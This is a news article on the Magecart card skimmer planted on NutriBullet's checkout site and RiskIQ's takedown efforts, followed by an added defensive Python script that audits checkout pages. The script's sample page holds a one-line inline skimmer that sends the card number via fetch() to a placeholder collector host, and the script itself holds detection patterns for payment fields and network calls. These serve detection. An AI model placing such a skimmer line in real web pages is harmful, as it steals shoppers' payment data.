Skimmer May Have Put NutriBullet Customers' Card Data at Risk for Nearly a Month

Blender maker is the latest victim of Magecart.

Blender manufacturer NutriBullet on Wednesday said it had identified and removed malicious code on its website that allowed attackers to steal payment card data entered by customers purchasing products on the site.

The move came about one month after security vendor RiskIQ first detected the malware on NutriBullet's website and apparently informed the company about it shortly thereafter. According to RiskIQ, NutriBullet did not respond to multiple attempts to alert it about the issue until today.

Researchers at RiskIQ, working in concert with ShadowServer and Abuse.ch — two malware-fighting nonprofits — instead took down the domain the attackers were using to store stolen credit card data. The effort resulted in the card skimmer being removed from NutriBullet's website on March 1, only to be replaced with a new one on March 5.

RiskIQ once again worked to neutralize the attacker's data-exfiltration domain and, in a repeat of the first time, the threat actors placed a new card skimmer on NutriBullet's website a few days later. Over the past few weeks, the criminals had access to NutriBullet's infrastructure and were repeatedly able to replace the skimmer domain in the code to make it work again, RiskIQ said in a report Wednesday. Customers who placed orders on NutriBullet's website between February 20 and today are likely to have been affected, RiskIQ said.

In an emailed statement to Dark Reading, NutriBullet acknowledged the issue and claimed the matter had been quickly resolved. NutriBullet's statement suggested the company first learned of the skimmer today, which is at odds with RiskIQ's claims about the company having been notified previously about the issue. RiskIQ has continued to maintain that it made multiple previous attempts to reach NutriBullet.

"Our IT team immediately sprang into action this morning (3/17/20) upon first learning from RiskIQ about a possible breach," NutriBullet said. "The company's IT team promptly identified malicious code and removed it." NutriBullet said it had launched a forensic investigation to determine how the attackers had managed to place the skimmers on its website. It has also updated its security policies to include multifactor authentication.

NutriBullet is the latest victim of Magecart, a collection of hacker groups that over the last few years has stolen data on hundreds of millions of credit and debit cards by placing card-skimming software on e-commerce sites. Though each of the multiple groups has slightly different tactics and techniques, the most common has been to place skimmers on online shopping cart software or on other third-party software components that websites commonly use.

The card skimmers are designed to steal card information that customers enter into websites when making a purchase. Over the last few years, groups operating under the Magecart umbrella have compromised tens of thousands of large organizations, including Ticketmaster, British Airways, and NewEgg.

Magecart Strategy Highlights Supply Chain Risks
Yonathan Klijnsma, threat researcher at RiskIQ, says the different tactics that Magecart groups use make response harder for organizations. "The end goal is always to get the skimmer functioning on a website's checkout process, but how they place it varies widely — they do it however they can," Klijnsma says. "The same goes for their initial breaching of websites, which can be exploitation of the website [content management system] to reuse of credentials and simply logging in as an administrator."

Klijnsma says RiskIQ has been tracking Magecart activities since 2014 and therefore is able to spot attacks like the one on NutriBullet as they happen. RiskIQ has no visibility into how many purchasers on NutriBullet's website may have had their credit card information stolen, he adds. But based on how Magecart operates, it is likely that customers who shopped at the blender maker's website over the period the skimmers were on it were affected. "We didn't expect radio silence from NutriBullet, but it was sadly the case."

Lamar Bailey, senior director of security research at Tripwire, says most midsize to large companies have a formal process for reporting vulnerabilities and security issues and typically respond quickly when informed about an issue. But getting smaller companies to respond to information about a security threat on their websites can sometimes be a struggle. "I will add that it is worse for companies that develop products for the general public," such as small Internet of Things manufacturers, Bailey says. "Many of them will deprecate the product or end-of-life it instead of fixing it. This leaves customers in a bad position."

For organizations, attacks such as those involving Magecart groups highlight the importance of supply chain security because in most incidents, Magecart operators have placed card skimmers in third-party software such as shopping carts, content management systems, and visitor-tracking tools.

"With modern applications using a host of third-party libraries and services, there are ample locations to effectively poison the supply chain," says Tim Mackey, principal security strategist at Synopsys CyRC.

Therefore, for organizations, the question increasingly is about whom they can trust. When software was sourced solely from commercial vendors, the trust was inherent in the contract between the vendor and purchaser, Mackey says. But when the provenance and authorship of software is unknown, website owners need to have a process for vetting that trust.

"If developers can't explain what changed in a given release, that's a problem," Mackey says. "If they can't explain how the code they depend upon gets updated, that's a problem. Both are in effect the equivalent of [saying] 'if it's on the Internet, it must be OK.'"
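One defensive check that follows from the article's description of Magecart skimmers (scripts injected into a checkout page that send card data to an attacker-controlled domain, swapped for a new domain each time one is taken down) and from the supply-chain point above: audit what a checkout page actually loads. The script below parses a captured page, flags external scripts from hosts outside an allowlist, flags allowlisted scripts that carry no Subresource Integrity hash, and flags inline scripts that both read payment fields and call out to the network. This is an added example, not code from Dark Reading, RiskIQ or NutriBullet; the allowlist, the sample page and every domain in it are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_SCRIPT_HOSTS = {"shop.example.com", "cdn.example.com"}  # assumed allowlist
NETWORK_CALLS = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new Image)\b")
PAYMENT_FIELDS = re.compile(r"card|cvv|cvc|expir", re.IGNORECASE)
class ScriptCollector(HTMLParser):
    """Collect external script tags (src, integrity) and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            if a.get("src"):
                self.external.append((a["src"], a.get("integrity")))
            else:
                self._in_script = True
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)
def audit_checkout_page(html, trusted_hosts=TRUSTED_SCRIPT_HOSTS):
    """Flag scripts from hosts outside the allowlist, allowlisted scripts with no
    SRI hash, and inline code that reads payment fields and also calls out."""
    p = ScriptCollector(); p.feed(html)
    findings = []
    for src, integrity in p.external:
        host = urlparse(src).hostname  # None for relative, first-party paths
        if host and host not in trusted_hosts:
            findings.append(f"untrusted script host: {host}")
        elif not integrity:
            findings.append(f"script without integrity attribute: {src}")
    for body in p.inline:  # a skimmer must both read the form and send it somewhere
        if PAYMENT_FIELDS.search(body) and NETWORK_CALLS.search(body):
            urls = re.findall(r"https?://[^\s'\"]+", body)
            hosts = sorted({urlparse(u).hostname for u in urls} - {None})
            findings.append("inline script reads payment fields and sends data to: "
                            + (", ".join(hosts) or "(dynamic url)"))
    return findings

# Constructed sample checkout page; the domains are placeholders, not real indicators.
SAMPLE_CHECKOUT_HTML = """<form><input name="cardnumber"><input name="cvv"></form>
<script src="https://cdn.example.com/cart.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://shop.example.com/app.js"></script>
<script src="https://static.third-party-analytics.invalid/t.js"></script>
<script>document.forms[0].onsubmit = function () { fetch('https://collector.skimmer-placeholder.invalid/g',
  {method: 'POST', body: document.querySelector('[name=cardnumber]').value}); };</script>"""
```

Running the audit against a page fetched on a schedule and diffing the findings is what catches the domain swaps RiskIQ describes; a new host or a changed hash on the checkout page is the signal to investigate.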

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...